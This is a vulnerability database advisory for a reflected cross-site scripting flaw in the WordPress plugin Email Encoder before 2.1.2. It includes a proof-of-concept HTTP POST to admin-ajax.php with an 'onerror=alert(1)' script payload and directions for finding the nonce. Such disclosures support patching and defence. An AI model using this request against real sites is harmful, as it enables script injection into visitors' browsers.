WordPress Plugin Vulnerabilities
Email Encoder < 2.1.2 - Reflected Cross Site Scripting
Description
The plugin has an endpoint that requires no authentication and will render a user supplied value in the HTML response without escaping or sanitizing the data.
Proof of Concept
The vulnerable function is nonce protected, the nonce can be found in the site's HTML source by searching for the javascript variable "eeb_ef" POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 129 Origin: http://127.0.0.1:8080 DNT: 1 Connection: keep-alive Referer: http://127.0.0.1:8080/ Cookie: wordpress_test_cookie=WP%20Cookie%20check Upgrade-Insecure-Requests: 1 action=eeb_get_email_form_output&eebsec=<your nonce here>&eebMethod=escape&eebDisplay=<img src=1 onerror=alert(1)>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-02 (about 2 years ago)
Added
2021-08-03 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)